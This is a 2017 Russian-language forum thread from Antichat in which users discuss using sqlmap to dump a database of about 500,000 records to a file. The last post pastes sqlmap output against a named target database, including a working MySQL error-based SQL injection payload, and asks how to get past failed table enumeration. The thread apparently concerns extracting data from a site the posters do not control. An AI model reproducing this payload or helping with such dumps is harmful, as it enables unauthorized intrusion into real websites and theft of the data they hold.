ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.01.2017, 11:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
43449
Репутация:
1
|
|
|
|
|
|
20.01.2017, 16:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от ms13
ms13 said:
↑
Ага, а что говорит...?
Ты извини, я тут приболел немного - гриппую, и, видимо, от этого мои телепатические способности угасли резко... что то да... потерял я сноровку с задачей нормальных вопросов, сорян )
|
|
|
|
20.01.2017, 16:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
как боженька, брагодарность
|
|
|
|
20.01.2017, 18:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль
|
|
|
|
20.01.2017, 18:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
759330
Репутация:
147
|
|
Сообщение от foozzione
foozzione said:
↑
есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль Ну он всё сохраняет... ты внимательно изучи содержимое консоли после этой процедуры!
|
|
|
|
20.01.2017, 18:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от ms13
ms13 said:
↑
Ну он всё сохраняет... ты внимательно изучи содержимое консоли после этой процедуры! то есть при отмене дампа, он не сохранит? так как записей довольно много, около 500к, стоит ли ждать ?
|
|
|
|
20.01.2017, 18:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от foozzione
foozzione said:
↑
то есть при отмене дампа, он не сохранит? так как записей довольно много, около 500к, стоит ли ждать ?
Код:
Code:
--where=DUMPWHERE Use WHERE condition while table dumping
--dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE)
|
|
|
|
20.01.2017, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
759330
Репутация:
147
|
|
Та по-моему кто-то морочит голову...
|
|
|
|
20.01.2017, 20:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
43449
Репутация:
1
|
|
Сообщение от foozzione
foozzione said:
↑
есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль --dump-format=HTML --where=С:\
|
|
|
|
20.01.2017, 20:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
43449
Репутация:
1
|
|
Код:
Code:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: fetch_country=Angola' AND EXTRACTVALUE(5143,CONCAT(0x5c,0x71716a7871,(SELECT (ELT(5143=5143,1))),0x71766a7871))-- MuFD
---
[19:45:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.3
back-end DBMS: MySQL >= 5.1
[19:45:19] [INFO] fetching tables for database: 'db1084280_bizcsp'
[19:45:22] [WARNING] the SQL query provided does not return any output
[19:45:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
Пробывал и no-cast и --hex не помгает |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
